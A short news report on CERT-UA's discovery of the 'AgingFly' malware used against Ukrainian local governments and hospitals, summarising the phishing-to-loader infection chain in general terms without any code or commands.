A new malware family named ‘AgingFly’ has been identified in attacks against local governments and hospitals that steal authentication data from Chromium-based browsers and WhatsApp messenger. The attacks were spotted in Ukraine by the country's CERT team last month. Based on the forensic evidence, targets may also include representatives of the Defense Forces. CERT-UA has attributed the attacks to a cyber threat cluster it tracks as UAC-0247. According to the Ukrainian agency, the attack begins with the target receiving an email purporting to be a humanitarian aid offer, which encourages them to click an embedded link. The link redirects to a legitimate site that had been compromised via a cross-site scripting (XSS) vulnerability, or to a fake site generated using an AI tool. CERT-UA says that the target receives an archive with a shortcut file (LNK) that launches a built-in HTA handler, which in turn connects to a remote resource to retrieve and execute the HTA file. The HTA displays a decoy form to divert attention and creates a scheduled task that downloads and runs an EXE payload that injects shellcode into a legitimate process. Next, the attackers deploy a two-stage loader in which the second stage uses a custom executable format, and the final payload is compressed and encrypted.